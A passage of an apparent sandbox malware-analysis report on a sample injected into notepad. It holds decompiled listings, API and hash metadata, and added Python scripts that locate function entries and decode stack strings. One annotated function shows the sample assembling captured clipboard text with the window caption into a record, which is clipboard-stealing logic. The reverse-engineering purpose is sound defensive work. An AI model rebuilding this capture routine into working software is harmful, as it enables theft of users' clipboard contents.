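# tail, then push ebp ; mov ebp,esp ; mov eax,[ebp+8] ; sub esp,0x40 ; ret.
CODE = bytes.fromhex("c3" + "cc" * 13 + "558bec8b450883ec40c3")

if __name__ == "__main__":
    print(hex(true_entry(CODE, BASE, BASE)))
```

In practice the input bytes come from the memory dump the report names (the 0x400000 sdmp), read at the decompiler's start address; the listing's "ref:" addresses and the control-flow graph node ranges are the check that the candidate is a real function boundary.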
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 259 41a670-41a6a1 call 41af60 RtlFreeHeap
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                  • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                  • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 262 41a7d0-41a804 call 41af60 LookupPrivilegeValueW
                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                  • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                  • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0041A6B0(intOrPtr _a4, int _a8) {
				void* _t10;
				void* _t11;

				// Same helper and argument shape as before LookupPrivilegeValueW above (context, context+table offset,
				// *(context+0xa..), 0, index): a per-API preparation step, index 0x36 here and 0x46 there; its body is not in this excerpt.
				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x36, _t11);
				ExitProcess(_a8);                             // exit code supplied by the caller; does not return
			}

                                                  APIs
                                                  • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6D8
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                  • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                  • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

C-Code - Quality: 42%
			// The 42% score again reflects a misaligned start: 0x407b44-0x407b4e decode as in/int1/std/sti, which is not code,
			// and the constant 0x8bec8b55 at the top of the else branch is the byte sequence 55 8B EC 8B (push ebp; mov ebp, esp;
			// mov ...), i.e. the real prologue. From there on the function builds the UTF-16 record
			// L"Clipboard" + L"\r\n\r\n" + <caption or L"Unknown"> + L"\r\n\r\n" + <input> and stores it in the object at
			// context+0x7d8. Helper roles (length, copy, append, compare) are inferred from the byte counts and uses seen here.
			E00407B44(void* __eax, void* __ebx, intOrPtr* __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				short _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				short _v38;
				short _v42;
				short _v46;
				short _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v68;
				void* __edi;
				void* __ebp;
				void* _t40;
				void* _t51;
				void* _t60;
				void* _t65;
				void* _t75;
				intOrPtr _t78;
				void* _t81;
				void* _t88;
				void* _t89;
				void* _t91;
				void* _t96;

				_t81 = __eax;
				asm("in eax, dx");                            // not real code (misaligned start)
				asm("int1");
				asm("std");
				_t65 = __ecx +  *__ecx;
				_t60 = __ebx + __esi;
				_t96 = _t60;
				asm("sti");
				if(_t96 >= 0) {                               // unreachable artefact of the misaligned start
					if (_t96 >= 0) goto L8;
					asm("loop 0x69");
					asm("arpl bp, ax");
					asm("adc eax, 0x469e9349");
					return 1;
				} else {
					__eax = 0x8bec8b55;                       // 55 8B EC 8B: push ebp; mov ebp, esp; the real function entry
					__ebp = __esp;
					__eax = _a8;
					__esp = __esp - 0x40;
					__eax = E0041C0D0(_a8);                   // E0041C0D0 = wide-string length (its result is doubled into a byte count below)
					if(__eax <= 0x1000) {                     // input capped at 0x1000 WCHARs
						_push(__ebx);
						_push(__esi);
						__esi = _a4;
						__ebx =  *((intOrPtr*)(_a4 + 0x7d8));  // output record object
						_v8 = __ebx;
						if(__ebx != 0) {
							__ecx = _a8;
							__edi = __eax + __eax;
							_t61 = _t60 + 0x1fb440;
							_t40 = E0041C0F0(_t65, _t60 + 0x1fb440, _t75);   // compare-like helper; only a zero result proceeds
							_t89 = _t88 + 0xc;
							if(_t40 == 0) {
								E0041BDE0(_t61, _a8, _t75);   // E0041BDE0(dst, src, byte count) = memcpy-like copy (see the 0x14 / 0x10 byte copies below)
								_t91 = _t89 + 0xc;
								_v12 = 0;
								_t77 = _t81 + 0x11860;        // 0x104-WCHAR caption buffer
								_v20 = 0xa000d;               // _v20.._v12: L"\r\n\r\n" (two CR/LF pairs, NUL-terminated by _v12)
								_v16 = 0xa000d;
								_v68 = 0x6c0043;              // _v68.._v52: L"Clipboard" as 32-bit immediates, low address first ("Cl","ip","bo","ar","d\0")
								_v64 = 0x700069;
								_v60 = 0x6f0062;
								_v56 = 0x720061;
								_v52 = 0x64;
								_v48 = 0;
								_v46 = 0;
								_v42 = 0;
								_v38 = 0;
								 *((intOrPtr*)( *((intOrPtr*)(_t81 + 0xcc0))))(_t81 + 0x11860, 0x104);   // indirect API call through context+0xcc0 fills the caption buffer (0x104 = MAX_PATH WCHARs)
								 *((intOrPtr*)( *((intOrPtr*)(_t81 + 0xcbc))))(0);
								if(0 <= 0x40) {               // the decompiler lost the call's return value, hence the constant comparisons
									if(0 == 0) {
										_v36 = 0x6e0055;      // _v36.._v24: L"Unknown", used when no caption was obtained
										_v32 = 0x6e006b;
										_v28 = 0x77006f;
										_v24 = 0x6e;
										E0041BDE0(_t77,  &_v36, 0x10);   // 16 bytes = L"Unknown\0" into the caption buffer
										_t91 = _t91 + 0xc;
									}
								} else {
									 *((short*)(_t81 + 0x118e0)) = 0;    // 0x118e0 - 0x11860 = 0x80 bytes: caption truncated to 0x40 WCHARs
								}
								_t83 = _t81 + 0x120e0;        // assembly buffer
								E0041BDE0(_t81 + 0x120e0,  &_v68, 0x14);   // 20 bytes = L"Clipboard\0"
								E0041C240(_t81 + 0x120e0,  &_v20, 0);      // E0041C240(dst, src, 0) = append; result: L"Clipboard\r\n\r\n<caption>\r\n\r\n<input>"
								E0041C240(_t83, _t77, 0);
								E0041C240(_t83,  &_v20, 0);
								E0041C240(_t83, _a8, 0);
								_t51 = E0041C0D0(_t83);
								_t78 = _v8;
								 *((intOrPtr*)(_t78 + 0x208c)) = _t51 + _t51;   // record+0x208c: length in bytes (2 * WCHAR count)
								_t40 = E0041BDE0(_t78 + 0x2094, _t83, E0041C0D0(_t83) + _t53);   // record+0x2094: the string; _t53 is unresolved, so the copy size is not fully recovered
								 *((intOrPtr*)(_t78 + 0x2090)) = 1;   // record+0x2090: ready flag
							}
						}
					}
					return _t40;
				}
			}

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C$a$b$d$i
                                                  • API String ID: 0-2334916691
                                                  • Opcode ID: 39fe6d663443100bf131b374ccb7f297ebea0d292b020008afe9c480943b156c
                                                  • Instruction ID: 997cc09fd66991c7798b4a6b172579768033c67ab25b2bee35c7713674c99300
                                                  • Opcode Fuzzy Hash: 39fe6d663443100bf131b374ccb7f297ebea0d292b020008afe9c480943b156c
                                                  • Instruction Fuzzy Hash: 4141D3B1E44208ABE710DBA5DC82BEEB7B9EF45308F00452EE509A7242D779694187A9
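E00407B44 writes its strings as 32-bit immediates into stack slots, which is why the report's String ID only recovers the characters "C$a$b$d$i". The script below is an added example for this report, not code from the sample or from Joe Sandbox: it replays the stack stores from the listing above into a frame, reads the UTF-16LE strings back, and rebuilds the record the function assembles. Slot offsets, widths and immediates are copied from the listing; the record field offsets (+0x208c, +0x2090, +0x2094) and the 0x1000-WCHAR input guard come from the same listing. The caption passed to build_record() is a constructed stand-in for whatever the indirect call through context+0xcc0 returns.

```python
"""Decode the stack-string immediates of E00407B44 and rebuild its record.

Added example for this report, not code from the sample. STACK_WRITES is
transcribed from the decompiled listing; the caption value is constructed.
"""

FRAME_SIZE = 68  # largest slot is _v68 (ebp-68); index 0 of the frame is ebp-68

# (N for slot _vN, width in bytes, immediate), in listing order. _vN is ebp-N,
# so a larger N is a lower address and comes earlier in memory.
STACK_WRITES = [
    (20, 4, 0x000A000D), (16, 4, 0x000A000D), (12, 2, 0),           # separator
    (68, 4, 0x006C0043), (64, 4, 0x00700069), (60, 4, 0x006F0062),  # header
    (56, 4, 0x00720061), (52, 4, 0x00000064),
    (48, 2, 0), (46, 2, 0), (42, 2, 0), (38, 2, 0),
    (36, 4, 0x006E0055), (32, 4, 0x006E006B), (28, 4, 0x0077006F),  # fallback caption
    (24, 4, 0x0000006E),
]

MAX_INPUT_WCHARS = 0x1000  # guard near the function entry: longer input is ignored


def lay_out(writes, frame_size=FRAME_SIZE):
    """Replay the stores into a zero-filled stack frame (low address first)."""
    frame = bytearray(frame_size)
    for slot, width, imm in writes:
        start = frame_size - slot
        frame[start:start + width] = imm.to_bytes(width, "little")
    return bytes(frame)


def read_wstr(frame, slot, frame_size=FRAME_SIZE):
    """NUL-terminated UTF-16LE string starting at &_v<slot>."""
    start = frame_size - slot
    return frame[start:].decode("utf-16-le").split("\x00", 1)[0]


FRAME = lay_out(STACK_WRITES)
HEADER = read_wstr(FRAME, 68)          # "Clipboard"
SEPARATOR = read_wstr(FRAME, 20)       # "\r\n\r\n"
FALLBACK_CAPTION = read_wstr(FRAME, 36)  # "Unknown"


def build_record(caption, text):
    """Mirror the E0041BDE0/E0041C240 sequence and the stores into the record.

    Returns None when the input exceeds the 0x1000-WCHAR guard, as the listing
    then skips the whole body.
    """
    if len(text) > MAX_INPUT_WCHARS:
        return None
    body = HEADER + SEPARATOR + (caption or FALLBACK_CAPTION) + SEPARATOR + text
    return {
        "len_bytes": 2 * len(body),         # record+0x208c: WCHAR count doubled
        "ready": 1,                         # record+0x2090
        "data": body.encode("utf-16-le"),   # record+0x2094 (copy size not fully recovered)
    }


if __name__ == "__main__":
    print(repr(HEADER), repr(SEPARATOR), repr(FALLBACK_CAPTION))
    print(build_record("", "sample text")["data"].decode("utf-16-le"))
```

The same replay works for any function in this report that stores immediates into adjacent stack slots: transcribe (slot, width, value) from the listing and read from the lowest-numbered slot of each run. The doubled length at +0x208c is the one value worth checking against a live capture, since it is what a consumer of the record would use to delimit the string.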
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                  • Instruction ID: 96df40c62202c1877907e345d483c56a0a8563335f27916598f1eb5986c55130
                                                  • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                  • Instruction Fuzzy Hash: EFF022307240499BDB09EB189D51BBA33E9EB94701F54C03AED49C7247EA31DD808394
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f7d11924b4d6243b8848bb8234bc3352aec8212ccffc58f94096e7f6bda49254
                                                  • Instruction ID: fcb057e5851fda7140be7754e97014f2b8c2e91b8136914f25ffb53c0e617e36
                                                  • Opcode Fuzzy Hash: f7d11924b4d6243b8848bb8234bc3352aec8212ccffc58f94096e7f6bda49254
                                                  • Instruction Fuzzy Hash: 1BC09B67E9905431D534684DBC532B4E76DE357138F157777EC09FB5505092C4E101DD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040E47A(void* __ebx, void* __edx) {
                                                  
                                                  				return  *0x8a58f176 & 0xe0bc6015;
                                                  			}



                                                  0x0040e490

                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 27b23560c617c8e4a14069ad948cc113376db82bc51ee8352848c52f3c5082c3
                                                  • Instruction ID: 4dfa375f4530153acd539587ef97e4baa72d458abee132717f89c92c527b70b7
                                                  • Opcode Fuzzy Hash: 27b23560c617c8e4a14069ad948cc113376db82bc51ee8352848c52f3c5082c3
                                                  • Instruction Fuzzy Hash: A7B0125BF460540585124D69F8813F1F7B4D58F132EC832E3CD5DF74025003C426959D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 94%
                                                  			E00AC8788(signed int __ecx, void* __edx, signed int _a4) {
                                                  				signed int _v8;
                                                  				short* _v12;
                                                  				void* _v16;
                                                  				signed int _v20;
                                                  				char _v24;
                                                  				signed int _v28;
                                                  				signed int _v32;
                                                  				char _v36;
                                                  				signed int _v40;
                                                  				char _v44;
                                                  				signed int _v48;
                                                  				signed int _v52;
                                                  				signed int _v56;
                                                  				signed int _v60;
                                                  				char _v68;
                                                  				void* _t216;
                                                  				intOrPtr _t231;
                                                  				short* _t235;
                                                  				intOrPtr _t257;
                                                  				short* _t261;
                                                  				intOrPtr _t284;
                                                  				intOrPtr _t288;
                                                  				void* _t314;
                                                  				signed int _t318;
                                                  				short* _t319;
                                                  				intOrPtr _t321;
                                                  				void* _t328;
                                                  				void* _t329;
                                                  				char* _t332;
                                                  				signed int _t333;
                                                  				signed int* _t334;
                                                  				void* _t335;
                                                  				void* _t338;
                                                  				void* _t339;
                                                  
                                                  				_t328 = __edx;
                                                  				_t322 = __ecx;
                                                  				_t318 = 0;
                                                  				_t334 = _a4;
                                                  				_v8 = 0;
                                                  				_v28 = 0;
                                                  				_v48 = 0;
                                                  				_v20 = 0;
                                                  				_v40 = 0;
                                                  				_v32 = 0;
                                                  				_v52 = 0;
                                                  				if(_t334 == 0) {
                                                  					_t329 = 0xc000000d;
                                                  					L49:
                                                  					_t334[0x11] = _v56;
                                                  					 *_t334 =  *_t334 | 0x00000800;
                                                  					_t334[0x12] = _v60;
                                                  					_t334[0x13] = _v28;
                                                  					_t334[0x17] = _v20;
                                                  					_t334[0x16] = _v48;
                                                  					_t334[0x18] = _v40;
                                                  					_t334[0x14] = _v32;
                                                  					_t334[0x15] = _v52;
                                                  					return _t329;
                                                  				}
                                                  				_v56 = 0;
                                                  				if(E00AC8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                  					_v56 = 1;
                                                  					if(_v8 != 0) {
                                                  						_t207 = E00AAE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                  					}
                                                  					_push(1);
                                                  					_v8 = _t318;
                                                  					E00AC718A(_t207);
                                                  					_t335 = _t335 + 4;
                                                  				}
                                                  				_v60 = _v60 | 0xffffffff;
                                                  				if(E00AC8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                  					_t333 =  *_v8;
                                                  					_v60 = _t333;
                                                  					_t314 = E00AAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                  					_push(_t333);
                                                  					_v8 = _t318;
                                                  					E00AC718A(_t314);
                                                  					_t335 = _t335 + 4;
                                                  				}
                                                  				_t216 = E00AC8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                  				_t332 = ";";
                                                  				if(_t216 < 0) {
                                                  					L17:
                                                  					if(E00AC8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                  						L30:
                                                  						if(E00AC8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                  							L46:
                                                  							_t329 = 0;
                                                  							L47:
                                                  							if(_v8 != _t318) {
                                                  								E00AAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                  							}
                                                  							if(_v28 != _t318) {
                                                  								if(_v20 != _t318) {
                                                  									E00AAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                  									_v20 = _t318;
                                                  									_v40 = _t318;
                                                  								}
                                                  							}
                                                  							goto L49;
                                                  						}
                                                  						_t231 = _v24;
                                                  						_t322 = _t231 + 4;
                                                  						_push(_t231);
                                                  						_v52 = _t322;
                                                  						E00AC718A(_t231);
                                                  						if(_t322 == _t318) {
                                                  							_v32 = _t318;
                                                  						} else {
                                                  							_v32 = E00AAE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                  						}
                                                  						if(_v32 == _t318) {
                                                  							_v52 = _t318;
                                                  							L58:
                                                  							_t329 = 0xc0000017;
                                                  							goto L47;
                                                  						} else {
                                                  							E00AA2340(_v32, _v8, _v24);
                                                  							_v16 = _v32;
                                                  							_a4 = _t318;
                                                  							_t235 = E00ABE679(_v32, _t332);
                                                  							while(1) {
                                                  								_t319 = _t235;
                                                  								if(_t319 == 0) {
                                                  									break;
                                                  								}
                                                  								 *_t319 = 0;
                                                  								_t321 = _t319 + 2;
                                                  								E00AAE2A8(_t322,  &_v68, _v16);
                                                  								if(E00AC5553(_t328,  &_v68,  &_v36) != 0) {
                                                  									_a4 = _a4 + 1;
                                                  								}
                                                  								_v16 = _t321;
                                                  								_t235 = E00ABE679(_t321, _t332);
                                                  								_pop(_t322);
                                                  							}
                                                  							_t236 = _v16;
                                                  							if( *_v16 != _t319) {
                                                  								E00AAE2A8(_t322,  &_v68, _t236);
                                                  								if(E00AC5553(_t328,  &_v68,  &_v36) != 0) {
                                                  									_a4 = _a4 + 1;
                                                  								}
                                                  							}
                                                  							if(_a4 == 0) {
                                                  								E00AAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                  								_v52 = _v52 & 0x00000000;
                                                  								_v32 = _v32 & 0x00000000;
                                                  							}
                                                  							if(_v8 != 0) {
                                                  								E00AAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                  							}
                                                  							_v8 = _v8 & 0x00000000;
                                                  							_t318 = 0;
                                                  							goto L46;
                                                  						}
                                                  					}
                                                  					_t257 = _v24;
                                                  					_t322 = _t257 + 4;
                                                  					_push(_t257);
                                                  					_v40 = _t322;
                                                  					E00AC718A(_t257);
                                                  					_t338 = _t335 + 4;
                                                  					if(_t322 == _t318) {
                                                  						_v20 = _t318;
                                                  					} else {
                                                  						_v20 = E00AAE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                  					}
                                                  					if(_v20 == _t318) {
                                                  						_v40 = _t318;
                                                  						goto L58;
                                                  					} else {
                                                  						E00AA2340(_v20, _v8, _v24);
                                                  						_v16 = _v20;
                                                  						_a4 = _t318;
                                                  						_t261 = E00ABE679(_v20, _t332);
                                                  						_t335 = _t338 + 0x14;
                                                  						while(1) {
                                                  							_v12 = _t261;
                                                  							if(_t261 == _t318) {
                                                  								break;
                                                  							}
                                                  							_v12 = _v12 + 2;
                                                  							 *_v12 = 0;
                                                  							E00AAE2A8(_v12,  &_v68, _v16);
                                                  							if(E00AC5553(_t328,  &_v68,  &_v36) != 0) {
                                                  								_a4 = _a4 + 1;
                                                  							}
                                                  							_v16 = _v12;
                                                  							_t261 = E00ABE679(_v12, _t332);
                                                  							_pop(_t322);
                                                  						}
                                                  						_t269 = _v16;
                                                  						if( *_v16 != _t318) {
                                                  							E00AAE2A8(_t322,  &_v68, _t269);
                                                  							if(E00AC5553(_t328,  &_v68,  &_v36) != 0) {
                                                  								_a4 = _a4 + 1;
                                                  							}
                                                  						}
                                                  						if(_a4 == _t318) {
                                                  							E00AAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                  							_v40 = _t318;
                                                  							_v20 = _t318;
                                                  						}
                                                  						if(_v8 != _t318) {
                                                  							E00AAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                  						}
                                                  						_v8 = _t318;
                                                  						goto L30;
                                                  					}
                                                  				}
                                                  				_t284 = _v24;
                                                  				_t322 = _t284 + 4;
                                                  				_push(_t284);
                                                  				_v48 = _t322;
                                                  				E00AC718A(_t284);
                                                  				_t339 = _t335 + 4;
                                                  				if(_t322 == _t318) {
                                                  					_v28 = _t318;
                                                  				} else {
                                                  					_v28 = E00AAE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                  				}
                                                  				if(_v28 == _t318) {
                                                  					_v48 = _t318;
                                                  					goto L58;
                                                  				} else {
                                                  					E00AA2340(_v28, _v8, _v24);
                                                  					_v16 = _v28;
                                                  					_a4 = _t318;
                                                  					_t288 = E00ABE679(_v28, _t332);
                                                  					_t335 = _t339 + 0x14;
                                                  					while(1) {
                                                  						_v12 = _t288;
                                                  						if(_t288 == _t318) {
                                                  							break;
                                                  						}
                                                  						_v12 = _v12 + 2;
                                                  						 *_v12 = 0;
                                                  						E00AAE2A8(_v12,  &_v68, _v16);
                                                  						if(E00AC5553(_t328,  &_v68,  &_v36) != 0) {
                                                  							_a4 = _a4 + 1;
                                                  						}
                                                  						_v16 = _v12;
                                                  						_t288 = E00ABE679(_v12, _t332);
                                                  						_pop(_t322);
                                                  					}
                                                  					_t296 = _v16;
                                                  					if( *_v16 != _t318) {
                                                  						E00AAE2A8(_t322,  &_v68, _t296);
                                                  						if(E00AC5553(_t328,  &_v68,  &_v36) != 0) {
                                                  							_a4 = _a4 + 1;
                                                  						}
                                                  					}
                                                  					if(_a4 == _t318) {
                                                  						E00AAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                  						_v48 = _t318;
                                                  						_v28 = _t318;
                                                  					}
                                                  					if(_v8 != _t318) {
                                                  						E00AAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                  					}
                                                  					_v8 = _t318;
                                                  					goto L17;
                                                  				}
                                                  			}

                                                  0x00ac8788
                                                  0x00ac8788
                                                  0x00ac8791
                                                  0x00ac8794
                                                  0x00ac8798
                                                  0x00ac879b
                                                  0x00ac879e
                                                  0x00ac87a1
                                                  0x00ac87a4
                                                  0x00ac87a7
                                                  0x00ac87aa
                                                  0x00ac87af
                                                  0x00b11ad3
                                                  0x00ac8b0a
                                                  0x00ac8b0d
                                                  0x00ac8b13
                                                  0x00ac8b19
                                                  0x00ac8b1f
                                                  0x00ac8b25
                                                  0x00ac8b2b
                                                  0x00ac8b31
                                                  0x00ac8b37
                                                  0x00ac8b3d
                                                  0x00ac8b46
                                                  0x00ac8b46
                                                  0x00ac87c6
                                                  0x00ac87d0
                                                  0x00b11ae0
                                                  0x00b11ae6
                                                  0x00b11af8
                                                  0x00b11af8
                                                  0x00b11afd
                                                  0x00b11afe
                                                  0x00b11b01
                                                  0x00b11b06
                                                  0x00b11b06
                                                  0x00ac87d6
                                                  0x00ac87f2
                                                  0x00ac87f7
                                                  0x00ac8807
                                                  0x00ac880a
                                                  0x00ac880f
                                                  0x00ac8810
                                                  0x00ac8813
                                                  0x00ac8818
                                                  0x00ac8818
                                                  0x00ac882c
                                                  0x00ac8831
                                                  0x00ac8838
                                                  0x00ac8908
                                                  0x00ac8920
                                                  0x00ac89f0
                                                  0x00ac8a08
                                                  0x00ac8af6
                                                  0x00ac8af6
                                                  0x00ac8af8
                                                  0x00ac8afb
                                                  0x00b11beb
                                                  0x00b11beb
                                                  0x00ac8b04
                                                  0x00b11bf8
                                                  0x00b11c0e
                                                  0x00b11c13
                                                  0x00b11c16
                                                  0x00b11c16
                                                  0x00b11bf8
                                                  0x00000000
                                                  0x00ac8b04
                                                  0x00ac8a0e
                                                  0x00ac8a11
                                                  0x00ac8a14
                                                  0x00ac8a15
                                                  0x00ac8a18
                                                  0x00ac8a22
                                                  0x00ac8b59
                                                  0x00ac8a28
                                                  0x00ac8a3c
                                                  0x00ac8a3c
                                                  0x00ac8a42
                                                  0x00b11bb0
                                                  0x00b11b11
                                                  0x00b11b11
                                                  0x00000000
                                                  0x00ac8a48
                                                  0x00ac8a51
                                                  0x00ac8a5b
                                                  0x00ac8a5e
                                                  0x00ac8a61
                                                  0x00ac8a69
                                                  0x00ac8a69
                                                  0x00ac8a6d
                                                  0x00000000
                                                  0x00000000
                                                  0x00ac8a74
                                                  0x00ac8a7c
                                                  0x00ac8a7d
                                                  0x00ac8a91
                                                  0x00ac8a93
                                                  0x00ac8a93
                                                  0x00ac8a98
                                                  0x00ac8a9b
                                                  0x00ac8aa1

                                                  APIs
                                                  Strings
                                                  • Kernel-MUI-Language-Disallowed, xrefs: 00AC8914
                                                  • Kernel-MUI-Number-Allowed, xrefs: 00AC87E6
                                                  • Kernel-MUI-Language-Allowed, xrefs: 00AC8827
                                                  • Kernel-MUI-Language-SKU, xrefs: 00AC89FC
                                                  • WindowsExcludedProcs, xrefs: 00AC87C1
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
